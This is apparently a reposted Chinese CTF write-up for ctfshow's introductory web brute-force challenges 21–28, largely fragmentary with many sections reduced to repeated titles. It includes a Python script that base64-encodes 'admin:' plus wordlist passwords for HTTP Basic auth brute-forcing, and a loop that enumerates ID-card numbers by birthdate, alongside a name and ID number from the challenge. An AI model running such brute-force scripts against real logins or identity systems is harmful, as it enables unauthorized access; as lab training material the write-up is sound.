【原创】ctfshow—web入门—爆破(21-28)

admin 2022年12月3日16:35:44评论21 views字数 730阅读2分26秒阅读模式

web21

【原创】ctfshow—web入门—爆破(21-28)

[huayang]base64的形式

把文件转位base64

#! /usr/bin/env python3
# _*_  coding:utf-8 _*_
import base64
# 字典文件路径
dic_file_path = 'C:/Users/huayang/Desktop/123.txt'
with open(dic_file_path, 'r') as f:
    password_dic = f.readlines()
username = 'admin:' # 用户名
for password in password_dic:
    str1=str.encode(username + password.strip())
    encodestr = base64.b64encode(str1)
    encodestr=str(encodestr)
    encodestr=encodestr.strip('b\'')
    encodestr=encodestr.replace("=","=")   #避免“=”被转译
    print(encodestr)
【原创】ctfshow—web入门—爆破(21-28)
【原创】ctfshow—web入门—爆破(21-28)
【原创】ctfshow—web入门—爆破(21-28)

web22

这是运气问题

flag.ctfer.com

【原创】ctfshow—web入门—爆破(21-28)

web23

有点麻烦

?token=3j

【原创】ctfshow—web入门—爆破(21-28)

web24

【原创】ctfshow—web入门—爆破(21-28)
【原创】ctfshow—web入门—爆破(21-28)
【原创】ctfshow—web入门—爆破(21-28)

web25

web26

web27

【原创】ctfshow—web入门—爆破(21-28)
【原创】ctfshow—web入门—爆破(21-28)

要去爆

for year in range(1990,1993):
    for month in range(1,13):
        for day in range(1,32):
            card = "621022" + str(year) + str("%02d"%(month)) + str("%02d"%(day)) + "5237"
            print(card)
高先伊 WEB 621022199002015237

号是绝对没错的,查不到是服务器的问题!!!

web28

[/huayang]

【原创】ctfshow—web入门—爆破(21-28)

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:35:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】ctfshow—web入门—爆破(21-28)http://cn-sec.com/archives/1443326.html

发表评论

匿名网友 填写信息